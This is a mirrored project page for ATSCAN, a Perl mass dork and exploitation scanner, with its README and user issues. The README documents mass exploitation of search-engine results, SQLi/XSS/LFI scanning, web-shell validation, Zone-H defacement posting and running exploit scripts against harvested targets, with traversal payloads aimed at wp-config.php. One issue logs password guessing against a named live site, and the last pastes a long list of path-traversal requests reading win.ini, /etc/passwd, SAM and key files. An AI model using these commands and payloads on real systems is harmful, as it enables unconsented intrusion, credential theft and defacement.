Code Monkey home page Code Monkey logo

atscan's Introduction

ATSCAN SCANNER

Advanced Mass Search / Dork / Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!
Codename:4n0n4t
AUTHOR:Ali MEHDIOUI
GROUP:Alisam@Technology
Description:

● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Mass Extern commands execution.
● Exploits and issues search.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress & Joomla sites.
● Wordpress theme and plugin detection.
● Find Admin page.
● Decode / Encode Base64 / MD5

● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect forms.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● IP Localisation
● Issues and Exploit search
● Interactive and Normal interface.
● And more...

★ Libreries to install:
Perl Required.
Works in all platforms. Disponible in Blackarch and Dracos Linux.
Download:
● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN
Permissions:
cd ATSCAN
chmod +x ./atscan.pl
Installation:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan
Repair Tool:
atscan --repair
Uninstall Tool:
atscan --uninstall
Commands:
--help / -h Help.
--proxy Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"]
Set proxy list [EX: --proxy file]
--prandom Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"]
--motor / -m bing google ask yandex sogou exalead googleapis googlecache or all
--apikey Apikey
--cx Googleapis ID
--mrandom Random of given engines
--brandom Random all disponibles agents
--freq Random time frequency (in seconds)
--time set browser time out
--dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t Target
--level / -l Scan level (Number of results pages to scan)
--zone Search engine country.
--param / -p Set test parameter EX:id,cat,product_ID
--save / -s Output.
--source Html output file
--bugtraq Serach exploits and issues
--content Print request content
--data Post and Get forms. See examples
--vshell Validate by url ex: --HOST/shell.php or file
--post Use post method
--get Use get method
--header Set headers
--fullHeaders Print full request headers
--host Domain name [Ex: site.com]
--nobanner Hide tool banner
--beep Produce beep sound if positive scan found.
--ifend Produce beep sound when scan process is finished.
--noverbose No scan verbose.
--ping Host ping.
--limit Limit max positive scan results.
--valid / -v Validate by string at least 1 is matching
--validAll Validate all given strings
--status Validate by http header status
--server Validate by server
--ifinurl Get targets with exact string matching
--sregex Get targets with exact regex matching
--exclude Get targets where strings do not exist in html
--excludeAll Get targets where all strings do not exist in html
--unique Get targets with exact dork matching
--replace Replace exact string
--replaceFROM Replace from string to the end of target
--exp / -e Exploit/Payload will be added to full target
--expHost Exploit will be added to the host
--expIp Exploit will be added to the host ip
--xss Xss scan
--sql Sqli scan
--lfi Local file inclusion
--joomrfi Scan for joomla local file inclusion.
--shell Shell link [Ex: http://www.site.com/shell.txt]
--wpafd Scan wordpress sites for arbitrary file download
--admin Get site admin page
--shost Get site subdomains
--port port
--tcp TCP port
--udp UDP port
--getlinks Get target html links
--wp Wordpress site
--joom Joomla site
--zip Get zip files
--md5 Convert to md5
--encode64 Encode base64 string
--decode64 decode base64 string
--TARGET Will be replaced by target in extern command
--HOST Will be replaced by host in extern command
--HOSTIP Will be replaced by host IP in extern command
--PORT Will be replaced by open port in extern command
--ips Collect Ips
--geoloc Ip geolocalisation
--regex Crawl to get strings matching regex
--noquery Remove string value from Query url [ex: site.com/index.php?id=string]
--command / -c Extern Command to execute
--popup Execute Extern Command in new terminal window
--zoneH Upload to Zone-H
--saveCookie Cookies output file
--setCookies Cookie file
--email Collect emails
rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9.
repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t "site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
--googleapi Google Apis
--shodan Shodan search
--count Search Shodan without Results
--count Search Shodan
--dnsreverset Shodan Reverse DNS Lookup
--dnsresolve Shodan Resolve DNS Lookup
--tokens String filters and parameters
--querysearch Search the directory of saved Shodan search queries
--query List the saved Shodan search queries
--querytags List the most popular Shodan tags
--myip List all services that Shodan crawls
--services List all services that Shodan crawls
--apinfo My Shodan API Plan Information
--ports List of port numbers that the crawlers are looking for
--protocols List all protocols that can be used when performing on-demand Internet scans via Shodan.
--honeyscore Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan
--facets Shodan search facets
--update Update tool
--repair Repair or force tool update.
--tool / -? Tool info.
--config User configuration.
--interactive / -i Interactive mode interface.
--uninstall Uninstall Tool.
Examples:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy file Ex: --proxy my_proxies.txt

RANDOM:
Random proxy: --prandom [proxy file]
Random browser: --brandom
Random engine: --mrandom [ENGINES]

SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

SEARCH ENGINE:
Search: atscan --dork [dork] --level [level]
Search: atscan -d [dork] -l [level] --getlinks
Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all
Set selective engines: atscan -d [dork] -l [level] -m google,bing,..
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Get Server wordpress sites: atscan -t [target] --wp
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ips

REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"

PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

DATA:
Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]
Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]

EXTERNAL COMMANDS:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "file"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"
atscan --shodan --search [string] --apikey [API KEY] -command [extern_command]

MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]

IP LOCALISATION:
atscan -t [ip/target] --geoloc

SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -t [target / targets.txt] --vshell [file path]
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --exclude [string]

ZONE-H:
atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"

SEARCH EXPLOITS:
atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1
atscan --bugtraq -d file.txt -l 1
atscan --bugtraq -d [string] -l 1--limit 10

GOOGLEAPIS SEARCH
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION]

SHODAN SEARCH
atscan --shodan --targget [ip or host or file] --apikey [API KEY]
atscan --shodan --dork [string or file] --apikey [API KEY]
atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]
atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]
atscan --shodan --count [query or file] --apikey [API KEY]
atscan --shodan --query --apikey [API KEY]
atscan --shodan --querysearch [query or file] --apikey [API KEY]
atscan --shodan --querytags --apikey [API KEY]
atscan --shodan --myip --apikey [API KEY]
atscan --shodan --apinfo --apikey [API KEY]
atscan --shodan --services --apikey [API KEY]
atscan --shodan --ports --apikey [API KEY]
atscan --shodan --tokens [string or file] --apikey [API KEY]

UPDATE TOOL:
atscan --update

UNINSTALL TOOL:
atscan --uninstall
THANKS TO:
Blackarch linux & Dragos Os developers to incorporate my project in their systems.

atscan's People

Contributors

alisamtechnology avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

atscan's Issues

error commad --email

i have command

atscan --dork list.txt --level 10 --email --save link.txt

error
Undefined subroutine &Subs: :eMails called at /usr/share/atscan/ /atscan.pl line 185.

Strings validation seems not working properly

Next command used:

sudo atscan -t http://site.com/page -v /home/ATSCAN/include.txt

[!] 1 Unique Result(s) Found!

==============================================================================
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

TARGET [1/1] http://site.com/page
IP ip here
AGENT Mozilla/5.0 (Mozilla/5.0 (compatible; Konqueror/3.5; en-US; SunOS) Safari
STATUS 200
SERVER Apache
CMS Wordpress
PLUGINS [!] Plugins detected!
- theme => theme here
SCAN http://site.com/page

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


[!] 1 Unique Result(s) Found!
[01:06:30] SCAN FINISHED!

I watched videos, there should be VALID string after CMS like:
VALID [word1][word2][word3]

Please advice.

LFI

Hello thank you for your work!around one week i scan with different dork on LFI and ATSCAN nothing search up.that normal?

googleapis erro

atscan_ -d inurl:wp-cotent -m googleapis -l 20 -s lis0.txt
Screenshot_20200524-160544

malformed JSON string, neither array, object, number, string or atom, at character offset 0 (before "(end of string)") at /usr/share/atscan/inc/lib/Subs.pm line 227.

interactive mode error

hello. i am get this error with help command after switching to interactive mode

atscan --interactive

help


[::] HELP
Undefined subroutine &Interactive::ltak called at /usr/share/atscan/inc/lib/lib/Interactive.pm line 384, line 1.

Show only sucessfull results

I did read the documentation and could not find a way to show only confirmed xss endpoints like:
--verbose / -v 1 show only sucessfull results | -v 2 show all tests

I'm still testing this great tool and learning how to operate it

Shodan scraping issue

trying to run a shodan scrape. Other scrape is working with search engines. Except google returns no results its probably due to tor proxy and being blocked. So i run on linux
sudo atscan --shodan --api apikeyhere --level 2 --dork dorkhere and it initializes and api connects OK and it shows the dork used and level but then upon returning results i get this error for each line or page. What is causing this? Thanks!

Use of uninitialized value $v_shoRes in pattern match (m//) at /usr/share/atscan/inc/lib/Shodan.pm line 75.
Use of uninitialized value $v_shoRes in pattern match (m//) at /usr/share/atscan/inc/lib/Shodan.pm line 75.

error

Can't locate HTTP/Cookies.pm in @inc (you may need to install the HTTP::Cookies module) (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.28.1 /usr/local/share/perl/5.28.1 /usr/lib/x86_64-linux-gnu/perl5/5.28 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.28 /usr/share/perl/5.28 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at atscan.pl line 45.
BEGIN failed--compilation aborted at atscan.pl line 45.

History and stay in "use" chain after run finishes

Hi! I have been testing/using interactive mode for some days now and it works fine so far!
Are u going to make a history function in a later stadium?
And when a run finishes the prompt alway jumps back to atscan> instead of staying in the chosen use chain.
Also trying to mod the script in my fork of your tool

Gtz BXCK

Salam khoya ana mn les fans dyalk brit rir ngolik b li atscan fiha chi mochkil f ip range

matalan akhoya fach kandir had command : atscan -t 45.115.36.227 -l 10 --sites
katkhdem mezyana ohya asslan tool m9awda hhh <3
[!] 7 Unique Result(s) Found!
[i] Results saved in z1.txt!
[!] [00:57:35] SCAN FINISHED!!
walakin fach kandir range : atscan -t 45.115.36.227-45.115.36.247 -l 10 --sites
makatkhdemch okat3tini
[!] No Results Found!
ye3ni fach kandir ip bo7do tatkhdem walakin kandir range makatkhdemch
osme7 lya khoya ola7fdek lina <3

can't use command --save file.txt

i have command like this
#atscan --dork list.txt --level 10 --save link.txt
when checking have done, i can't see anything in file link.txt

Does not work on Google Colab.

Always getting the Error

Can't locate HTTP/Cookies.pm in @INC (you may need to install the HTTP::Cookies module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at atscan.pl line 45.
BEGIN failed--compilation aborted at atscan.pl line 45.

Can't locate HTTP/Cookies.pm in @INC

Error message when starting an application

Can't locate HTTP/Cookies.pm in @inc (you may need to install the HTTP::Cookies module) (@inc contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.32.1 /usr/local/share/perl/5.32.1 /usr/lib/x86_64-linux-gnu/perl5/5.32 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.32 /usr/share/perl/5.32 /usr/local/lib/site_perl) at /usr/share/atscan//atscan.pl line 45.
BEGIN failed--compilation aborted at /usr/share/atscan//atscan.pl line 45.

no wordpress found

I scanned my server IP which have multiple wordpress websites on it , but ATSCAN did not detect it: no results found.
The command was: perl atscan.pl --wp -t IP

يوجد مشكله في تخمين البسورد

[ ]-----------------------------------
[23:27:25] [Target 7/26]
TARGET: http://www.dermahaircenter.com
CMS: Wordpress!
USER: admin
PASS: admin%d
SCAN: Not Vulnerable!
USER: admin
PASS: 1234%d
SCAN: Not Vulnerable!
USER: admin
PASS: 123%d
SCAN: Not Vulnerable!
USER: admin
PASS: password%d
SCAN: Not Vulnerable!
USER: admin
PASS: user%d
SCAN: Not Vulnerable!
USER: admin
PASS: admin123%d
SCAN: Not Vulnerable!
USER: admin
PASS: admin1%d
SCAN: Not Vulnerable!
USER: admin
PASS: ADMIN1%d
SCAN: Not Vulnerable!
USER: admin
PASS: ADMIN
SCAN: Not Vulnerable!

cant locate term

it wont run on Xubuntu 19.10
Input: sudo atscan
Output: Can't locate Term/ReadKey.pm in @inc (you may need to install the Term::ReadKey module) (@inc contains: /Desktop/inc/lib/lib /Desktop/inc/lib /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.28.1 /usr/local/share/perl/5.28.1 /usr/lib/x86_64-linux-gnu/perl5/5.28 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.28 /usr/share/perl/5.28 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at /Desktop/inc/lib/lib/Login.pm line 6.
BEGIN failed--compilation aborted at /Desktop/inc/lib/lib/Login.pm line 6.
Compilation failed in require at /Desktop/atscan.pl line 122.
BEGIN failed--compilation aborted at /Desktop/atscan.pl line 122.

2nd try.
Click on the atscan app
output:Can't locate Term/ReadKey.pm in @inc (you may need to install the Term::ReadKey module) (@inc contains: /Desktop/inc/lib/lib /Desktop/inc/lib /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.28.1 /usr/local/share/perl/5.28.1 /usr/lib/x86_64-linux-gnu/perl5/5.28 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.28 /usr/share/perl/5.28 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at /Desktop/inc/lib/lib/Login.pm line 6.
BEGIN failed--compilation aborted at /Desktop/inc/lib/lib/Login.pm line 6.
Compilation failed in require at /Desktop/atscan.pl line 122.
BEGIN failed--compilation aborted at /Desktop/atscan.pl line 122.

it can help you for your projects ^^

The complete file is in this source source: http://www.designsim.com.au/hacker.txt

Ps: 10241 lines ; 719242 caracters ^^


  • This file will make a tolerably good penetration testing script, and you
  • may wish to check the security of the file locations targeted here, and
  • you will certainly want to secure the target files.
  • (The first query is sheer wishful thinking)
    ****************************************************************************/
    GET *
    < NTP/1.2 >"
    DEL /default.asp HTTP/1.0"
    DEL /default.htm HTTP/1.0"
    DEL /default.html HTTP/1.0"
    DEL /index.asp HTTP/1.0"
    DEL /index.htm HTTP/1.0"
    DEL /index.html HTTP/1.0"
    DEL /index.php HTTP/1.0"
    GET /administrator/ /cache/ /components/ /editor/ /help/ HTTP/1.0"
    GET /www/NEW/atutor/ATutor/registration.php HTTP/1.0"
    GET ../../../.../../../../windows/win.ini HTTP/1.0"
    GET ../../../.../../../../winnt/win.ini HTTP/1.0"
    GET ../../../../../../../../../../etc/
    HTTP/1.0"
    GET ..\..\..\..\..\..\windows\win.ini HTTP/1.0"
    GET ..\..\..\..\..\..\winnt\win.ini HTTP/1.0"
    GET ./.cfg HTTP/1.0"
    GET ........../windows/win.ini HTTP/1.0"
    GET ........../winnt/win.ini HTTP/1.0"
    GET ..../windows/win.ini HTTP/1.0"
    GET ..../winnt/win.ini HTTP/1.0"
    GET .nsf/../windows/win.ini HTTP/1.0"
    GET .nsf/../winnt/win.ini HTTP/1.0"
    GET / HTTP/1.0" 200 366
    GET / HTTP/1.0" 200 366 "-" "-"
    GET / HTTP/1.0" 200 366 "-" "Links (2.1pre9; Linux 2.4.20 i686; 80x30)"
    GET / HTTP/1.1"
    GET / HTTP/1.1" 200 288
    GET / HTTP/1.1" 200 288 "-"
    GET / HTTP/1.1" 200 366
    GET / HTTP/1.1" 200 366 "-"
    GET /%08owa_util.signature HTTP/1.0"
    GET /%0aowa_util.signature HTTP/1.0"
    GET /%20owa_util.signature HTTP/1.0"
    GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini HTTP/1.0"
    GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini HTTP/1.0"
    GET /%2e%2e/%2e%2e/%2e%2ewindows/win.ini HTTP/1.0"
    GET /%2e%2e/%2e%2e/%2e%2ewinnt/win.ini HTTP/1.0"
    GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00 HTTP/1.0"
    GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00 HTTP/1.0"
    GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00 HTTP/1.0"
    GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00 HTTP/1.0"
    GET /%2f..%2f..%2f../windows/win.ini HTTP/1.0"
    GET /%2f..%2f..%2f../winnt/win.ini HTTP/1.0"
    GET /%3Cinvalid%3Ehello.html HTTP/1.1"
    GET /%3Cscript%3Ealert%281%29%3C/script%3E.html HTTP/1.1"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%2e%2e%5cwin.ini HTTP/1.0"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.0"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%2e%2e%5cwin.ini HTTP/1.0"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.0"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%2e%2e%5cwin.ini HTTP/1.0"
    GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%2e%2e%5cwin.ini HTTP/1.0"
    GET /%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.0"
    GET /%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.0"
    GET /%5c..%5c..%5c..%5cwinnt%5cwin%2eini HTTP/1.0"
    GET /%5c..%5c..%5c..%5cwinnt%5cwin.ini HTTP/1.0"
    GET /%80../%80../%80../%80../%80../%80../%80../%80../ HTTP/1.0"
    GET /.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.0"
    GET /.%252e/.%252e/.%252e/.%252e/winnt/win.ini HTTP/1.0"
    GET /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam HTTP/1.0"
    GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam HTTP/1.0"
    GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ HTTP/1.0"
    GET /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam HTTP/1.0"
    GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam HTTP/1.0"
    GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ HTTP/1.0"
    GET /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam HTTP/1.0"
    GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam HTTP/1.0"
    GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ HTTP/1.0"
    GET /..%2F..%2F..%2F..%2F..%2Fwindows/repair/sam HTTP/1.0"
    GET /..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini HTTP/1.0"
    GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini HTTP/1.0"
    GET /..%5C..%5C..%5Cwindows%5Csystem.ini HTTP/1.0"
    GET /..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini HTTP/1.0"
    GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.0"
    GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/win.ini HTTP/1.0"
    GET /..%5c..%5c/domains/localdomain/00.hsf HTTP/1.0"
    GET /..%5c..%5c/log/everything.txt HTTP/1.0"
    GET /..................../windows/win.ini HTTP/1.0"
    GET /..................../winnt/win.ini HTTP/1.0"
    GET /................../windows/win.ini HTTP/1.0"
    GET /................../winnt/win.ini HTTP/1.0"
    GET /................/windows/win.ini HTTP/1.0"
    GET /................/winnt/win.ini HTTP/1.0"
    GET /.............../windows/win.ini HTTP/1.0"
    GET /.............../winnt/win.ini HTTP/1.0"
    GET /............../windows/win.ini HTTP/1.0"
    GET /............../winnt/win.ini HTTP/1.0"
    GET /........../windows/win.ini HTTP/1.0"
    GET /........../winnt/win.ini HTTP/1.0"
    GET /........./windows/win.ini HTTP/1.0"
    GET /........./winnt/win.ini HTTP/1.0"
    GET /......../windows/win.ini HTTP/1.0"
    GET /......../winnt/win.ini HTTP/1.0"
    GET /.../.../.../.../.../.../.../windows/win.ini HTTP/1.0"
    GET /.../.../.../.../.../.../.../winnt/win.ini HTTP/1.0"
    GET /.../.../.../.../windows/win.ini HTTP/1.0"
    GET /.../.../.../.../winnt/win.ini HTTP/1.0"
    GET /.../.../windows/win.ini HTTP/1.0"
    GET /.../.../winnt/win.ini HTTP/1.0"
    GET /.../windows/win.ini HTTP/1.0"
    GET /.../winnt/win.ini HTTP/1.0"
    GET /...\windows\win.ini HTTP/1.0"
    GET /...\winnt\win.ini HTTP/1.0"
    GET /../../../.../../../../windows/win.ini HTTP/1.0"
    GET /../../../.../../../../winnt/win.ini HTTP/1.0"
    GET /../../../../../../../../../../../../../etc/passwd HTTP/1.0"
    GET /../../../../../../../../../../etc/* HTTP/1.0"
    GET /../../../../../../../../../../win/ini.ini HTTP/1.0"
    GET /../../../../../../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../../../../../etc/passwd HTTP/1.0"
    GET /../../../../../../../../../win/ini.ini HTTP/1.0"
    GET /../../../../../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../../../../etc/passwd HTTP/1.0"
    GET /../../../../../../../../win/ini.ini HTTP/1.0"
    GET /../../../../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../../winnt/win.ini HTTP/1.0"
    GET /../../../../../Windows/Win.ini? HTTP/1.0"
    GET /../../../../../Windows/Win.ini?Simple-test HTTP/1.0"
    GET /../../../../../windows/win.ini HTTP/1.0"
    GET /../../../../../windows/win.ini? HTTP/1.0"
    GET /../../../../../windows/win.ini?Simple-test HTTP/1.0"
    GET /../../../../../winnt/win.ini HTTP/1.0"
    GET /../../../../etc/passwd HTTP/1.1"
    GET /../../../../windows/win.ini HTTP/1.0"
    GET /../../../../winnt/win.ini HTTP/1.0"
    GET /../../../windows/win.ini HTTP/1.0"
    GET /../../../winnt/win.ini HTTP/1.0"
    GET /../../var/run/vy_netman.cfg HTTP/1.0"
    GET /../../windows/win.ini HTTP/1.0"
    GET /../../winnt/win.ini HTTP/1.0"
    GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0"
    GET /../Data/vCAP.db HTTP/1.0"
    GET /../config.dat HTTP/1.0"
    GET /../examples//WEB-INF/../../../../../windows/win.ini HTTP/1.0"
    GET /../examples//WEB-INF/../../../../../winnt/win.ini HTTP/1.0"
    GET /../windows/win.ini HTTP/1.0"
    GET /../winnt/win.ini HTTP/1.0"
    GET /................\windows\win.ini HTTP/1.0"
    GET /................\winnt\win.ini HTTP/1.0"
    GET /..........\windows\win.ini HTTP/1.0"
    GET /..........\winnt\win.ini HTTP/1.0"
    GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.0"
    GET /..\..\..\..\..\..\temp\temp.class HTTP/1.0"
    GET /..\windows\win.ini HTTP/1.0"
    GET /..\winnt\win.ini HTTP/1.0"
    GET /./WEB-INF/ HTTP/1.0"
    GET /./account/index.jsp HTTP/1.0"
    GET /........../windows/win.ini HTTP/1.0"
    GET /........../winnt/win.ini HTTP/1.0"
